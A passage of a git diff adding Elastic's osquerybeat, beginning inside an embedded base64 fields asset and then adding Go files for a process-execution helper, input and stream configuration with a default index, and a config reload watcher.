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" +} diff --git a/x-pack/osquerybeat/include/include.go b/x-pack/osquerybeat/include/include.go new file mode 100644 index 00000000000..f890a7386da --- /dev/null +++ b/x-pack/osquerybeat/include/include.go @@ -0,0 +1,5 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package include diff --git a/x-pack/osquerybeat/internal/command/command.go b/x-pack/osquerybeat/internal/command/command.go new file mode 100644 index 00000000000..1c8669e0946 --- /dev/null +++ b/x-pack/osquerybeat/internal/command/command.go @@ -0,0 +1,72 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package command + +import ( + "context" + "fmt" + "io" + "os/exec" + "strings" +) + +func Execute(ctx context.Context, name string, arg ...string) (out string, err error) { + cmd := exec.Command(name, arg...) + stdout, err := cmd.StdoutPipe() + if err != nil { + return + } + + stderr, err := cmd.StderrPipe() + if err != nil { + return + } + + err = cmd.Start() + if err != nil { + return + } + + var ( + outbuf strings.Builder + errbuf strings.Builder + ) + + finished := make(chan error, 1) + + wait := func() error { + _, err := io.Copy(&outbuf, stdout) + if err != nil { + return err + } + + _, err = io.Copy(&errbuf, stderr) + if err != nil { + return err + } + return cmd.Wait() + } + + go func() { + finished <- wait() + }() + + // Wait either on process finish or context cancel + select { + case err = <-finished: + if err != nil { + s := strings.TrimSpace(errbuf.String()) + if s == "" { + return + } + return "", fmt.Errorf("%s: %w", s, err) + } + case <-ctx.Done(): + cmd.Process.Kill() + err = ctx.Err() + } + + return outbuf.String(), nil +} diff --git a/x-pack/osquerybeat/internal/config/config.go b/x-pack/osquerybeat/internal/config/config.go new file mode 100644 index 00000000000..f25f23a0407 --- /dev/null +++ b/x-pack/osquerybeat/internal/config/config.go @@ -0,0 +1,68 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// Config is put into a different package to prevent cyclic imports in case +// it is needed in several locations + +package config + +import ( + "time" +) + +// Default index name for ad-hoc queries, since the dataset is defined at the stream level, for example: +// streams: +// - id: '123456' +// data_stream: +// dataset: osquery_manager.result +// type: logs +// query: select * from usb_devices + +const DefaultStreamIndex = "logs-osquery_manager.result-default" + +type StreamConfig struct { + ID string `config:"id"` + Query string `config:"query"` + Interval time.Duration `config:"interval"` + Index string `config:"index"` // ES output index pattern +} + +type InputConfig struct { + Type string `config:"type"` + Streams []StreamConfig `config:"streams"` +} + +type Config struct { + Inputs []InputConfig `config:"inputs"` +} + +type void struct{} +type inputTypeSet map[string]void + +var none = void{} + +var DefaultConfig = Config{} + +func StreamsFromInputs(inputs []InputConfig) ([]StreamConfig, []string) { + var ( + streams []StreamConfig + ) + + typeSet := make(inputTypeSet, 1) + for _, input := range inputs { + typeSet[input.Type] = none + for _, s := range input.Streams { + if s.Index == "" { + s.Index = DefaultStreamIndex + } + streams = append(streams, s) + } + } + + var inputTypes []string + for t := range typeSet { + inputTypes = append(inputTypes, t) + } + return streams, inputTypes +} diff --git a/x-pack/osquerybeat/internal/config/config_test.go b/x-pack/osquerybeat/internal/config/config_test.go new file mode 100644 index 00000000000..6197c99ade2 --- /dev/null +++ b/x-pack/osquerybeat/internal/config/config_test.go @@ -0,0 +1,7 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build !integration + +package config diff --git a/x-pack/osquerybeat/internal/config/watcher.go b/x-pack/osquerybeat/internal/config/watcher.go new file mode 100644 index 00000000000..fcade5ad65b --- /dev/null +++ b/x-pack/osquerybeat/internal/config/watcher.go @@ -0,0 +1,47 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package config + +import ( + "context" + + "github.com/elastic/beats/v7/libbeat/common/reload" +) + +type reloader struct { + ctx context.Context + ch chan<- []InputConfig +} + +func (r *reloader) Reload(configs []*reload.ConfigWithMeta) error { + var inputConfigs []InputConfig + for _, cfg := range configs { + var icfg InputConfig + err := cfg.Config.Unpack(&icfg) + if err != nil { + return err + } + inputConfigs = append(inputConfigs, icfg) + } + + select { + case <-r.ctx.Done(): + default: + r.ch <- inputConfigs + } + + return nil +} + +func WatchInputs(ctx context.Context) <-chan []InputConfig { + ch := make(chan []InputConfig) + r := &reloader{ + ctx: ctx, + ch: ch, + } + reload.Register.MustRegisterList("inputs", r) + + return ch +} diff --git a/x-pack/osquerybeat/internal/distro/distro.go b/x-pack/osquerybeat/internal/distro/distro.go new file mode 100644 index 00000000000..7c6b8ac80be --- /dev/null +++ 